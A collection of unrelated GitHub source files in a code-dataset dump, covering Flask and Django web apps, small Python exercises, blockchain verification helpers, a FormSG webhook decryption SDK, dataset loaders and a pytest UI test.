https://flask-sqlalchemy.palletsprojects.com/en/2.x/api/#flask_sqlalchemy.SQLAlchemy.create_all\n\n@app.route('/')\ndef indexView():\n '''Return a list of users.'''\n return 'hi'; # fixed in a later exercise\n return '';\n\n@app.route('/users/')\ndef usersView():\n '''Show a list of users, hyperlinked.'''\n #query and then save to a variable\n usersInformation = Users.returnUserList_alpha();\n return render_template('users.html',\n usersInformation = usersInformation);\n\n@app.route('/users/new', methods=['GET', 'POST'])\ndef getNewUser():\n '''Form for creating a new user.'''\n\n form = UserForm();\n\n if form.validate_on_submit():\n \n formInformation = {\n \"firstName\": form.firstName.data,\n \"lastName\": form.lastName.data,\n \"imageURL\": form.imageLink.data\n };\n\n newUserInstance = Users(first_name=formInformation[\"firstName\"], \n last_name=formInformation[\"lastName\"], \n image_url=formInformation[\"imageURL\"]);\n\n db.session.add(newUserInstance)\n db.session.commit();\n\n flash(f'New user, {formInformation[\"firstName\"]} {formInformation[\"lastName\"]}, Created!', 'success');\n return redirect(url_for('usersView'));\n \n else:\n return render_template('forms_users.html', form=form, formCancelOption=False);\n\n@app.route('/users/', methods=['GET', 'POST']) # 'POST' allowed to shortcut from a form because it is a 'POST' request\ndef viewUser(userID):\n '''View a user by ID.'''\n\n if request.method == \"POST\":\n # destroy any information by malicious actors attempting to take advantage of this 'POST' route even though it does nothing\n request.data = None;\n\n selectedUser = Users.returnUserByID(userID);\n\n if not selectedUser: # maybe refactor into own method?\n return '404';\n\n foundPosts = Posts.returnPostsByUserID(userID);\n\n return render_template('user.html',\n userInformation = selectedUser,\n userPosts = foundPosts);\n\n@app.route('/users//edit', methods=['GET', 'POST'])\ndef editUser(userID):\n '''Edit a user by ID.'''\n selectedUser = Users.returnUserByID(userID);\n\n if not selectedUser: # maybe refactor into own method?\n return '404';\n\n # do a pre-render of the form\n form = UserForm(\n firstName=selectedUser.first_name, \n lastName=selectedUser.last_name, \n imageLink=selectedUser.image_url)\n\n if form.validate_on_submit():\n 
selectedUser.first_name = form.firstName.data;\n selectedUser.last_name = form.lastName.data;\n selectedUser.image_url = form.imageLink.data;\n db.session.commit();\n flash('Information updated.', 'success');\n return redirect(f'/users/{userID}');\n\n else:\n return render_template('forms_users.html', form=form, formCancelOption=True, userID=userID);\n\n@app.route('/users//delete')\ndef deleteUserView(userID):\n '''Delete a user by ID.'''\n selectedUser = Users.returnUserByID(userID);\n\n if not selectedUser: # maybe refactor into own method?\n return '404';\n \n db.session.delete(selectedUser);\n db.session.commit();\n flash('User deleted.', 'success');\n return redirect(url_for('usersView'));\n\n# Posts\n@app.route('/posts/')\ndef viewPostView(postID):\n selectedPost = Posts.returnPostByID(postID);\n if not selectedPost: # maybe refactor and combine with \"if not selectedUser:\"\n return '404';\n \n selectedUser = Users.returnUserByID(selectedPost.author_id);\n\n return render_template('post.html', postInformation=selectedPost, userInformation=selectedUser);\n\n@app.route('/posts//edit', methods=['GET', 'POST'])\ndef editPostView(postID):\n\n selectedPost = Posts.returnPostByID(postID);\n if not selectedPost: # maybe refactor and combine with \"if not selectedUser:\"\n return '404';\n\n postFormInstance = PostForm(postTitle=selectedPost.title, postContent=selectedPost.content);\n\n if postFormInstance.validate_on_submit():\n selectedPost.updatePost(title=postFormInstance.postTitle.data, content=postFormInstance.postContent.data);\n return redirect(f'/posts/{postID}');\n else:\n return render_template('forms_posts.html',\n form=postFormInstance, postInformation=selectedPost, formType='editPost');\n\n@app.route('/users//posts/new', methods=['GET', 'POST'])\ndef newPostView(userID):\n\n selectedUser = Users.returnUserByID(userID);\n\n if not selectedUser: # maybe refactor into own method?\n return '404';\n\n postFormInstance = PostForm();\n\n if postFormInstance.validate_on_submit():\n newPost = Posts(title=postFormInstance.postTitle.data, content=postFormInstance.postContent.data, author_id=userID);\n db.session.add(newPost);\n db.session.commit();\n return redirect(f'/users/{userID}');\n \n else:\n return render_template('forms_posts.html', \n userInformation=selectedUser, \n form=postFormInstance, formType='newPost');\n\n@app.route('/posts//delete')\ndef deletePostView(postID):\n \n selectedPost = Posts.returnPostByID(postID);\n if not selectedPost: # maybe refactor and combine with \"if not selectedUser:\"\n return '404';\n \n db.session.delete(selectedPost)\n db.session.commit();\n\n return redirect(url_for('usersView'));","repo_name":"YiJohnZhang/sb_u02_assignments","sub_path":"02_23.02.11_blogly_02-03/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12634188727","text":"#################################\n# PROJECT EULER - PROBLEM 078 #\n#################################\n# The solution below is based on the formula given in:\n# https://en.wikipedia.org/wiki/Partition_(number_theory)#Partition_function\n\nimport time\nfrom itertools import cycle, count\n\n\ndef pentagonal(n: int) -> int:\n return n * (3 * n - 1) // 2\n\n\ndef partition(n: int) -> int:\n global partitions\n if n <= 1:\n return 1\n if n not in partitions:\n signs = cycle([1, 1, -1, -1])\n pentagonals = [p for p in generalized_pentagonals if p <= n]\n partitions[n] = sum(sign * partition(n - 
p)\n                            for sign, p in zip(signs, pentagonals)) % 10**6\n    return partitions[n]\n\n\nstart = time.time()\n\nP = 250\n\npartitions = {0: 1, 1: 1}\ngeneralized_pentagonals = \\\n    sorted([k * (3 * k - 1)//2 for k in range(-P, P) if k != 0])\n\nprint(next((n for n in count(0) if partition(n) == 0)))\n\nend = time.time()\nprint(f\"Program runtime: {end - start} seconds\")\n","repo_name":"pzuehlke/Project-Euler-Solutions","sub_path":"problem_078.py","file_name":"problem_078.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73001572947","text":"# WAP to calculate compound interest; compounded annually, it is given by:\n# A = P(1 + R/100)^T\n# Compound Interest = Amount – Principal Where,\n# A is amount\n# P is the principal amount\n# R is the rate and\n# T is the time span\n\n\ndef CompoundInterest(p, r, t):\n    a = p * (pow((1 + r / 100), t))\n    ci = a - p\n    return ci\n\n\nprincipal = float(input(\"Enter the principal amount: \"))\nrate = float(input(\"Enter rate of interest: \"))\ntime = float(input(\"Enter time in years: \"))\nprint(f'The Compound Interest will be {CompoundInterest(principal, rate, time)}')\n","repo_name":"BeighIrtiqa/Hands-On-to-Python","sub_path":"Python_Programs/CompoundInterest.py","file_name":"CompoundInterest.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12587415080","text":"import ctypes\nfrom typing import Any\n\n\nclass DynamicArray:\n    \"\"\"Dynamic array akin to a simplified Python list.\"\"\"\n\n    def __init__(self) -> None:\n        \"\"\"Create an empty array.\"\"\"\n        self._n = 0  # number of actual elements\n        self._capacity = 1  # array capacity\n        self._array = self._make_array(self._capacity)  # low-level array\n\n    def __len__(self) -> int:\n        \"\"\"Return the number of elements stored in this array.\"\"\"\n        return self._n\n\n    def __getitem__(self, k: int) -> Any:\n        \"\"\"\n        Return element at index k.\n\n        Raise an error if invalid index.\n        \"\"\"\n        if not isinstance(k, int):\n            raise TypeError(\"index must be an integer\")\n        if not 0 <= k < self._n:\n            raise IndexError(\"index out of range\")\n        return self._array[k]  # retrieve from internal array\n\n    def _resize(self, c: int) -> None:\n        \"\"\"Resize internal array to capacity c.\"\"\"\n        new_array = self._make_array(c)\n\n        # copy elements to new array\n        for k in range(self._n):\n            new_array[k] = self._array[k]\n\n        self._array = new_array\n        self._capacity = c\n\n    def _make_array(self, c: int) -> ctypes.Array[Any]:\n        \"\"\"Create and return low-level array with capacity c.\"\"\"\n        return (c * ctypes.py_object)()\n\n    def insert(self, k: int, element: object) -> None:\n        \"\"\"\n        Insert element at index k and shift subsequent elements rightward.\n\n        Raise an error if invalid index.\n        \"\"\"\n        if not isinstance(k, int):\n            raise TypeError(\"index must be an integer\")\n        if not 0 <= k <= self._n:\n            raise IndexError(\"index out of range\")\n        if self._n == self._capacity:  # not enough room\n            self._resize(2 * self._capacity)  # double capacity\n\n        # shift elements rightward, starting from the end so nothing is overwritten\n        for j in range(self._n, k, -1):\n            self._array[j] = self._array[j - 1]\n\n        self._array[k] = element\n        self._n += 1\n\n    def append(self, element: object) -> None:\n        \"\"\"Add element to the end of this array.\"\"\"\n        self.insert(self._n, element)\n\n    def remove(self, element: object) -> None:\n        \"\"\"\n        Remove first occurrence of element.\n\n        Raise ValueError if element is not found.\n        \"\"\"\n        
for k in range(self._n):\n            if self._array[k] == element:\n                for j in range(k, self._n - 1):  # shift to fill gap\n                    self._array[j] = self._array[j + 1]\n                self._array[self._n - 1] = None  # help garbage collection\n                self._n -= 1\n                return  # exit immediately\n        raise ValueError(\"element not found\")  # only reached if no match\n","repo_name":"alexbouayad/algorithms-mypy","sub_path":"array/dynamic.py","file_name":"dynamic.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39984629222","text":"from django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom app import settings\nfrom app.settings import BUS_STATION_CSV\nfrom django.core.paginator import Paginator\n\n\ndef index(request):\n    return redirect(reverse(bus_stations))\n\n\ndef data_base():\n    bus_base = []\n    with open(BUS_STATION_CSV, 'r', encoding=\"cp1251\") as file:\n        file.readline()\n        for data in file:\n            name = data.split(';')[1].split('»')[0][1:]+'»'\n            street = data.split(';')[1].split('», ')[-1][:-1]\n            district = data.split(';')[6]\n            bus_base.append({'Name': name, 'Street': street, 'District': district})\n    return bus_base\n\n\nnew_base = data_base()\n\n\ndef bus_stations(request):\n    bus_station_list = []\n    current_page = request.GET.get('page', '1')\n    mark_start = int(current_page) * settings.STR_PER_PAGE - settings.STR_PER_PAGE\n    mark_end = int(current_page) * settings.STR_PER_PAGE\n    max_mark = round(len(new_base) / settings.STR_PER_PAGE + 0.5)\n\n    for data in new_base[mark_start: mark_end]:\n        bus_station_list.append(data)\n\n    if int(current_page) <= 1:\n        prev_page_url = None\n    else:\n        prev_page_url = str(f'?page={int(current_page)-1}')\n    if int(current_page) >= max_mark:\n        next_page_url = None\n    else:\n        next_page_url = str(f'?page={int(current_page) + 1}')\n\n    return render(request, 'index.html', context={\n        'bus_stations': bus_station_list,\n        'current_page': f'',\n        'prev_page_url': prev_page_url,\n        'next_page_url': next_page_url,\n    })\n\n\ndef pagi_view(request):\n    number = request.GET.get('page')\n    paginator = Paginator(new_base, settings.STR_PER_PAGE)\n    pagi = paginator.get_page(number)\n    msg = pagi.object_list\n    if pagi.has_next():\n        next_number = f'?page={pagi.next_page_number()}'\n    else:\n        next_number = None\n    if pagi.has_previous():\n        previous_number = f'?page={pagi.previous_page_number()}'\n    else:\n        previous_number = None\n    return render(request, 'index.html', context={\n        'bus_stations': msg,\n        'current_page': pagi,\n        'prev_page_url': previous_number,\n        'next_page_url': next_number,\n    })\n","repo_name":"devitos/HW_pagination","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"646583097","text":"#A sequence of N elements is sorted in ascending order. 
Count how many times x appears in this sequence.\n#For example, given the sequence {1,1,2,2,2,2,3} and x=2, there are four elements with value 2, so print 4.\n#Note: unless the algorithm is designed with O(logN) time complexity, the solution will be judged as exceeding the time limit.\n#n can be up to 1,000,000.\n\n#Solution\nfrom bisect import bisect_left,bisect_right\n\n#Function that returns the number of data whose values lie in [left_value, right_value]\ndef count_by_range(array,left_value,right_value):\n    right_index = bisect_right(array,right_value)\n    left_index = bisect_left(array,left_value)\n    return right_index-left_index\n\nn,x = map(int,input().split())\narray = list(map(int,input().split()))\n\n#The integer value we want to find\ncount = count_by_range(array,x,x)\n\n#Print -1 if the value does not exist\nif count == 0:\n    print(-1)\nelse:\n    print(count)","repo_name":"YeongM/PythonPractice","sub_path":"BinarySearch/문제2.py","file_name":"문제2.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5006352032","text":"import random\n\n# A bullet of mass m1 g and speed v1 m/s is fired into a door and gets embedded exactly at the centre of the door. The door is l m wide and weighs m kg. It is hinged at one end and rotates about a vertical axis practically without friction. Find the angular speed of the door just after the bullet embeds into it.\n\nqns = open('./questions.txt', 'w')\nans = open('./answers.txt','w')\n\nno_of_samples = 500000\n\ndef cal1(m1, m2, v1, l) :\n    am = (m1*v1*l)/(1000*2)\n    i = (m2*l*l)/3\n    return round(am/i,1)\n\ndef type1() :\n    m1 = random.randint(1,500)\n    m2 = random.randint(1,100)\n    l = random.randint(1,100)\n    v1 = random.randint(1000,1500)\n    q = \"A bullet of mass \" + str(m1) + \" g and speed \" + str(v1) + \" m/s is fired into a door and gets embedded at the centre of the door. The door is \" + str(l) + \" m wide and weighs \" + str(m2) + \" kg. It is hinged at one end and rotates about a vertical axis. 
Find the angular speed of the door just after the bullet embeds into it.\\n\"\n a = str(cal1(m1, m2, v1, l)) + \" rad/s\\n\"\n return q,a\n\nfor i in range(no_of_samples):\n ques, answer = type1()\n qns.write(ques)\n ans.write(answer)\n\nqns.close()\nans.close()\n","repo_name":"misterpawan/scimat2","sub_path":"science/RotationalMotion/bullet_block_angvel/bullet_block_angvel.py","file_name":"bullet_block_angvel.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"74904225745","text":"#coding=utf-8\nfrom uliweb.orm import *\nfrom uliweb.utils.common import get_var\nfrom uliweb.i18n import ugettext_lazy as _\n\nclass Cron_Job(Model):\n title = Field(str, max_length=300, verbose_name=_('Title'), required=True)\n time = Field(str, max_length=20, verbose_name=_('Time'), required=True) #m h d M w\n\n instances = ManyToMany('async_tasks', reference_fieldname='task_id')\n timeout = Field(int, verbose_name=_('Timeout')) #毫秒\n\n modified_user = Reference('user', verbose_name=_('Modified User'))\n modified_time = Field(DATETIME, verbose_name=_('Modified Time'),\n auto_now=True, auto_now_add=True)\n enabled = Field(bool, verbose_name=_('Enabled'))\n version = Field(int)\n\n def __unicode__(self):\n return self.title\n\n class AddForm:\n fields = [\n 'title', 'time',\n ]\n\n class EditForm:\n fields = [\n 'title', 'time', 'enabled'\n ]\n\n class Table:\n fields = [\n {'name':'time', 'width':80},\n {'name':'title', 'width':300},\n {'name':'enabled', 'width':120},\n {'name':'action', 'width':120},\n ]\n\n\nclass Cron_Task(Model):\n ##UUID string\n id = Field(str, max_length=36, verbose_name=_('ID'), primary_key=True,\n index=True, unique=True)\n label = Field(str, max_length=300, verbose_name=_('Label'))\n cron_job = Reference('cron_job', verbose_name=_('Cron Job'), collection_name='tasks')\n depend_tasks = Field(JSON, verbose_name=_('Depend Tasks'),\n default=[]) #[id, id, ...]\n # parent_task = Reference(verbose_name=_('Parent Task'), collection_name='children')\n # children_count = Field(int, verbose_name=_('Children Count'))\n command = Field(str, max_length=1000, verbose_name=_('Command'))\n work_directory = Field(str, max_length=1000, verbose_name=_('Work Directory'))\n queue = Field(str, max_length=256, verbose_name=_('Queue'))\n timeout = Field(int, verbose_name=_('Timeout')) #毫秒\n\n modified_user = Reference('user', verbose_name=_('Modified User'))\n modified_time = Field(DATETIME, verbose_name=_('Modified Time'),\n auto_now=True, auto_now_add=True)\n\n def __unicode__(self):\n return self.label\n\n","repo_name":"limodou/uliweb-apps","sub_path":"uliweb_apps/cron/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"71386973265","text":"from django.shortcuts import render, redirect\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nimport random\nfrom .models import Photo\n\ndef home(request):\n return render(request, 'home.html')\n\ndef aboutus(request):\n return render(request, 'aboutus.html')\n\ndef movie(request) :\n value = 'movie'\n movieList = {}\n\n movieList[1] = '토이스토리'\n movieList[2] = '스파이더맨'\n movieList[3] = '코코'\n movieList[4] = '레미제라블'\n movieList[5] = '타이타닉'\n movieList[6] = '알라딘'\n movieList[7] = '겨울왕국'\n movieList[8] = '라푼젤'\n i = random.randint(1,8)\n\n img_name = movieList[i] + \".jpg\"\n\n return 
render(request, 'movie.html', {'movieList' : movieList[i], 'img_name' : img_name})\n\n\ndef food(request):\n value = 'food'\n foodList = {}\n foodList[1] = '떡볶이'\n foodList[2] = '우동'\n foodList[3] = '피자'\n foodList[4] = '곱창'\n foodList[5] = '돈가스'\n foodList[6] = '라면'\n foodList[7] = '롤초밥'\n foodList[8] = '부대찌개'\n foodList[9] = '샐러드'\n foodList[10] = '쌀국수'\n foodList[11] = '스테이크'\n foodList[12] = '제육볶음'\n foodList[13] = '짜장면'\n foodList[14] = '초밥'\n foodList[15] = '양념치킨'\n foodList[16] = '순대국'\n foodList[17] = '짬뽕'\n foodList[18] = '초밥'\n foodList[19] = '팟타이'\n foodList[20] = '팬케이크'\n foodList[21] = '해장국'\n foodList[22] = '제육볶음'\n foodList[23] = '라면'\n foodList[24] = '삼겹살' \n foodList[25] = '햄버거' \n i = random.randint(1,25)\n\n img_name = foodList[i] + \".PNG\"\n\n return render(request,'food.html',{'foodList':foodList[i], 'img_name' : img_name})\n\ndef new (request):\n if request.method == 'POST' :\n\n myfile1 = request.FILES.get('image1', '')\n myfile2 = request.FILES.get('image2', '')\n myfile3 = request.FILES.get('image3', '')\n myfile4 = request.FILES.get('image4', '')\n\n picturelist = {}\n picturelist[1] = myfile1\n picturelist[2] = myfile2\n picturelist[3] = myfile3\n picturelist[4] = myfile4\n\n i = random.randint(1,4)\n myfile = picturelist[i]\n\n fs = FileSystemStorage()\n filename = fs.save(myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n return render(request, 'newresult.html', {'uploaded_file_url': uploaded_file_url})\n else :\n return render(request, 'new.html')\n\n\ndef photo(request):\n photo = Photo.objects\n return render(request, 'home.html',{'photo':photo})\n\n","repo_name":"KangSuzy/Choice-Maker","sub_path":"choicemaker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1761251696","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n'''\n改进的冒泡排序\n'''\n\n\ndef bubble_sort_advance(lists):\n count = len(lists)\n for i in range(count): # 从0开始排序\n found = False\n for j in range(1, count - i):\n if lists[j - 1] > lists[j]:\n lists[j - 1], lists[j] = lists[j], lists[j - 1]\n print(\"排序过程:\", lists)\n found = True\n if not found:\n break\n\n return lists\n\n\na = [6, 1, 2, 7, 9, 3, 4, 5, 10, 8]\nprint(\"排序前:\", a)\nb = bubble_sort_advance(a)\nprint(\"排序后\", b)\n","repo_name":"lindo-zy/Data-structure-and-algorithm","sub_path":"Sort/bubble_sort_advance.py","file_name":"bubble_sort_advance.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"22852506197","text":"from wallet import Wallet\nfrom helpers.util import hash_string_256, hash_block\n\n\n\nclass Verification:\n\n @staticmethod\n def valid_proof( transactions, last_hash, proof):\n\n guess = (str([tx.to_ordered_dict() for tx in transactions]) + str(last_hash) + str(proof)).encode()\n guess_hash = hash_string_256(guess)\n return guess_hash[0:2] == '00'\n\n\n\n\n @classmethod \n def verify_chain(clss, blockchain):\n\n for (index, block) in enumerate(blockchain):\n if index == 0:\n continue\n if block.previous_hash != hash_block(blockchain[index - 1]):\n return False\n if not clss.valid_proof(block.transactions[:-1], block.previous_hash, block.proof):\n print('Invalid proof')\n return False\n return True\n\n\n @staticmethod\n def verify_transaction( transaction, get_balance, check_funds=True):\n\n if check_funds:\n sender_balance = get_balance(transaction.sender)\n return 
sender_balance >= transaction.amount and Wallet.verify_trans(transaction)\n else:\n return Wallet.verify_trans(transaction)\n\n\n \n\n @classmethod\n def verify_transactions(clss, open_transactions, get_balance):\n return all([clss.verify_transaction(tx, get_balance, False) for tx in open_transactions])","repo_name":"beeshaker/farmscoin","sub_path":"helpers/verification.py","file_name":"verification.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21057991056","text":"__all__ = ['verify_signature', 'decrypt_content', 'decrypt_attachment']\nimport json\nimport logging\nimport re\nfrom time import time\nfrom typing import Any\nfrom typing import Dict\nfrom typing import Mapping\nfrom typing import Optional\nfrom typing import cast\nfrom urllib.parse import urlparse\n\nfrom nacl.encoding import Base64Encoder\nfrom nacl.exceptions import BadSignatureError\nfrom nacl.public import Box\nfrom nacl.public import PrivateKey\nfrom nacl.public import PublicKey\nfrom nacl.signing import VerifyKey\nimport requests\n\nlogger = logging.getLogger(__name__)\n\n# See https://github.com/opengovsg/formsg-javascript-sdk#step-3---verify-the-signature # noqa\nformsg_webhook_public_key = VerifyKey(\n b'3Tt8VduXsjjd4IrpdCd7BAkdZl/vUCstu9UvTX84FWw=',\n encoder=Base64Encoder,\n)\nencrypted_content_regex = re.compile((\n r'^(?P[\\w\\+\\/\\=]*)\\;'\n r'(?P[\\w\\+\\/\\=]*)\\:'\n r'(?P[\\w\\+\\/\\=]*)$'\n))\n\n\ndef verify_signature(\n webhook_uri: str,\n signature_header: str,\n signature_expiry_seconds: float = 60,\n webhook_public_key: VerifyKey = formsg_webhook_public_key,\n) -> Mapping[str, Any]:\n # v1 is signature, s is submissionId, f is formId, t is submission epoch\n logger.debug('X-FormSG-Signature is <%s>.', signature_header)\n\n formsg_signature: Dict[str, Any] = {}\n for part in signature_header.split(','):\n k, v = part.split('=', 1)\n formsg_signature[k] = v\n\n # Javascript url.href adds a trailing `/` to root domain urls\n # https://github.com/opengovsg/formsg-javascript-sdk/blob/master/src/webhooks.ts#L25\n u = urlparse(webhook_uri)\n if not u.path:\n u = u._replace(path='/')\n webhook_uri = u.geturl()\n\n signature_timestamp_millis = int(formsg_signature['t'])\n webhook_public_key.verify(\n smessage='.'.join((\n webhook_uri,\n formsg_signature['s'],\n formsg_signature['f'],\n formsg_signature['t'],\n )).encode('ascii'),\n signature=Base64Encoder.decode(formsg_signature['v1']),\n )\n\n if time() - (signature_timestamp_millis / 1000) > signature_expiry_seconds:\n raise BadSignatureError('FormSG signature has expired.')\n\n return formsg_signature\n\n\ndef decrypt_content(\n body: Mapping[str, Any],\n secret_key: str, # Base64 encoded secret key\n) -> Mapping[str, Any]:\n # Some FormSG submissions are in a data field while others are not.\n body = body.get('data', body)\n encrypted_content = body['encryptedContent']\n\n m = encrypted_content_regex.match(encrypted_content)\n if not m:\n raise ValueError('Encrypted content has bad format.')\n\n submission_public_key = m.group('submission_public_key')\n nonce = m.group('nonce')\n encrypted_message = m.group('encrypted_message')\n\n box = Box(\n PrivateKey(secret_key.encode('ascii'), encoder=Base64Encoder),\n PublicKey(\n submission_public_key.encode('ascii'),\n encoder=Base64Encoder,\n ),\n )\n\n plaintext = box.decrypt(\n encrypted_message.encode('ascii'),\n Base64Encoder.decode(nonce.encode('ascii')),\n encoder=Base64Encoder,\n )\n\n return 
cast(Mapping[str, Any], json.loads(plaintext))\n\n\ndef decrypt_attachment(\n body: Mapping[str, Any],\n field_id: str,\n secret_key: str, # Base64 encoded secret key\n timeout: float = 5, # Default timeout for requests\n) -> Optional[bytes]:\n # Some FormSG submissions are in a data field while others are not.\n body = body.get('data', body)\n\n # DEVX-467: `field_id` did not include an attachment; its an optional field\n try:\n # Either attachmentDownloadUrls or field_id can be missing\n url = body['attachmentDownloadUrls'][field_id]\n except KeyError:\n return None\n\n r = requests.get(url, timeout=timeout)\n r.raise_for_status()\n\n attachment_body = r.json()\n encrypted_file: Mapping[str, str] = attachment_body['encryptedFile']\n box = Box(\n PrivateKey(secret_key.encode('ascii'), encoder=Base64Encoder),\n PublicKey(\n encrypted_file['submissionPublicKey'].encode('ascii'),\n encoder=Base64Encoder,\n ),\n )\n\n return box.decrypt(\n encrypted_file['binary'].encode('ascii'),\n Base64Encoder.decode(encrypted_file['nonce'].encode('ascii')),\n encoder=Base64Encoder,\n )\n","repo_name":"fivehealth/formsg-python-sdk","sub_path":"formsg/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"29774847135","text":"#!/usr/bin/env python3\n\n\"\"\"\nCheck that all .whl files in the dist folder have the correct LICENSE files\nincluded.\n\nTo run:\n $ python3 setup.py bdist_wheel\n $ ./ci/check_wheel_licenses.py\n\"\"\"\n\nfrom pathlib import Path\nimport sys\nimport zipfile\n\nEXIT_SUCCESS = 0\nEXIT_FAILURE = 1\n\nproject_dir = Path(__file__).parent.resolve().parent\ndist_dir = project_dir / 'dist'\nlicense_dir = project_dir / 'LICENSE'\n\nlicense_file_names = {path.name for path in sorted(license_dir.glob('*'))}\nfor wheel in dist_dir.glob('*.whl'):\n print(f'Checking LICENSE files in: {wheel}')\n with zipfile.ZipFile(wheel) as f:\n wheel_license_file_names = {Path(path).name\n for path in sorted(f.namelist())\n if '.dist-info/LICENSE' in path}\n if not (len(wheel_license_file_names) and\n wheel_license_file_names.issuperset(license_file_names)):\n print(f'LICENSE file(s) missing:\\n'\n f'{wheel_license_file_names} !=\\n'\n f'{license_file_names}')\n sys.exit(EXIT_FAILURE)\nsys.exit(EXIT_SUCCESS)\n","repo_name":"tcjwoods/tc_cvs-p1","sub_path":"device/Dependencies/matplotlib-main/ci/check_wheel_licenses.py","file_name":"check_wheel_licenses.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5819270091","text":"from typing import Tuple, List\n\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision import datasets\nfrom torchvision import transforms as T\n\nDEFAULT_DATA_DIR = \"datasets/\"\n\n\ndef get_cifar10_train(root: str = DEFAULT_DATA_DIR,\n transforms: T.Compose = None) -> Dataset:\n ds = datasets.CIFAR10(root=root,\n train=True,\n download=True,\n transform=transforms)\n return ds\n\ndef get_cifar10_test(root: str = DEFAULT_DATA_DIR,\n transforms: T.Compose = None) -> Dataset:\n return datasets.CIFAR10(root=root,\n train=False,\n download=True,\n transform=transforms)\n\n\ndef get_cifar10_data(root: str = DEFAULT_DATA_DIR,\n train_transforms: T.Compose = None,\n test_transforms: T.Compose = None) -> List[Dataset]:\n \"\"\"\n\n :rtype: object\n \"\"\"\n cifar10_train = get_cifar10_train(root, train_transforms)\n cifar10_test = 
get_cifar10_test(root, test_transforms)\n return [cifar10_train, cifar10_test]\n\n\ndef get_cifar10_feature_extractor(image_size: Tuple[int, int] = (224, 224)) -> T.Compose:\n return T.Compose([\n T.PILToTensor(),\n T.Resize(image_size, T.InterpolationMode.BILINEAR, antialias=False),\n T.ConvertImageDtype(torch.float32),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])","repo_name":"Pallisaard/ATIA-convnets-vs-transformers","sub_path":"data/cifar10.py","file_name":"cifar10.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15531488131","text":"'''\nAuthor: TylerQA 990687322@qq.com\nDate: 2023-04-26 16:27:38\nLastEditors: TylerQA 990687322@qq.com\nLastEditTime: 2023-04-27 11:44:21\nFilePath: \\atfx_-ui_framework\\testcases\\test_review.py\nDescription: 这是默认设置,请设置`customMade`, 打开koroFileHeader查看配置 进行设置: https://github.com/OBKoro1/koro1FileHeader/wiki/%E9%85%8D%E7%BD%AE\n'''\nimport pytest\nimport pytest_check as check\nimport sys,os\nfrom loguru import logger\nsys.path.append(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))),'tools'))\nfrom global_SystemEnv import SystemEnv\nfrom handle_excel import HandleExcel\nsys.path.append(os.path.join(SystemEnv.CP_PAGE_OBJ))\nsys.path.append(os.path.join(SystemEnv.BOS_PAGE_OBJ))\nsys.path.append(os.path.join(SystemEnv.DATA_DIR))\nfrom bos_home_page_obj import Bos_Home_Page_Obj\nfrom bos_clientlist_page_obj import Bos_Client_Page_Obj\n\n\n@pytest.mark.usefixtures('browser')\nclass TestReview(object):\n\n test_data = HandleExcel(os.path.join(SystemEnv.DATA_DIR,'testcases.xlsx'),'gm_kyc').read_excel_data_obj()\n \n @pytest.mark.run(order=2)\n @pytest.mark.regress\n @pytest.mark.parametrize('data',test_data)\n def test_review(self,data,browser):\n case_index = self.test_data.index(data)\n if hasattr(SystemEnv,f'account{case_index+2}'):\n data.account = getattr(SystemEnv,f'account{case_index+2}')\n\n logger.info(f'当前用例:审核主账号: {data.account}')\n\n #进入账号详情页\n bos_home = Bos_Home_Page_Obj(browser)\n bos_home.into_client_list(data.account)\n\n #审核\n bos_client_list = Bos_Client_Page_Obj(browser)\n bos_client_list.review(data.account,1)\n\n #断言并获取交易账号\n check.is_in(bos_client_list.status,'Successful (1st Review) 成功(初审)')\n\nif __name__ == '__main__': \n pytest.main(['-vs',\n os.path.abspath(__file__),\n '--disable-pytest-warnings']) \n","repo_name":"Tyler96-QA/API_UI_FW","sub_path":"atfx_ui_framework/testcases/test_review.py","file_name":"test_review.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29657436706","text":"#\n#\n#\n\nfrom BCDataStream import *\nfrom enumeration import Enumeration\nfrom base58 import public_key_to_bc_address, hash_160_to_bc_address\nimport socket\nimport 